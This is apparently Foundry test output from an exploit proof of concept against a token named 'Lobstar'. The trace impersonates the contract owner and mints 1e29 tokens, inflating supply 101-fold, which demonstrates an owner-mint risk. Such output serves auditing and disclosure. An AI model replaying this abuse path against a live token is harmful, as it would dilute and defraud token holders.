Compiling 21 files with Solc 0.8.30
Solc 0.8.30 finished in 427.22ms
Compiler run successful!

Ran 1 test for test/Exploit.t.sol:ExploitTest
[PASS] testExploit() (gas: 44384)
Logs:
  Token: Lobstar
  Total Supply Before: 1000000000000000000000000000
  Owner: 0xA69eA6e67c768375180D2ca50ee259da537C225c
  Total Supply After: 101000000000000000000000000000
  Inflation multiplier: 101
  Owner Balance After: 100250000001000000000000000173

Traces:
  [44384] ExploitTest::testExploit()
    ├─ [3038] MintBurnTeamToken::name() [staticcall]
    │   └─ ← [Return] "Lobstar"
    ├─ emit log_named_string(key: "Token", val: "Lobstar")
    ├─ [2388] MintBurnTeamToken::totalSupply() [staticcall]
    │   └─ ← [Return] 1000000000000000000000000000 [1e27]
    ├─ emit log_named_uint(key: "Total Supply Before", val: 1000000000000000000000000000 [1e27])
    ├─ [2426] MintBurnTeamToken::owner() [staticcall]
    │   └─ ← [Return] 0xA69eA6e67c768375180D2ca50ee259da537C225c
    ├─ emit log_named_address(key: "Owner", val: 0xA69eA6e67c768375180D2ca50ee259da537C225c)
    ├─ [0] VM::prank(0xA69eA6e67c768375180D2ca50ee259da537C225c)
    │   └─ ← [Return]
    ├─ [10836] MintBurnTeamToken::mint(0xA69eA6e67c768375180D2ca50ee259da537C225c, 100000000000000000000000000000 [1e29])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xA69eA6e67c768375180D2ca50ee259da537C225c, value: 100000000000000000000000000000 [1e29])
    │   └─ ← [Stop]
    ├─ [388] MintBurnTeamToken::totalSupply() [staticcall]
    │   └─ ← [Return] 101000000000000000000000000000 [1.01e29]
    ├─ emit log_named_uint(key: "Total Supply After", val: 101000000000000000000000000000 [1.01e29])
    ├─ emit log_named_uint(key: "Inflation multiplier", val: 101)
    ├─ [468] MintBurnTeamToken::balanceOf(0xA69eA6e67c768375180D2ca50ee259da537C225c) [staticcall]
    │   └─ ← [Return] 100250000001000000000000000173 [1.002e29]
    ├─ emit log_named_uint(key: "Owner Balance After", val: 100250000001000000000000000173 [1.002e29])
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.26s (395.36ms CPU time)

Ran 1 test suite in 4.26s (1.26s CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
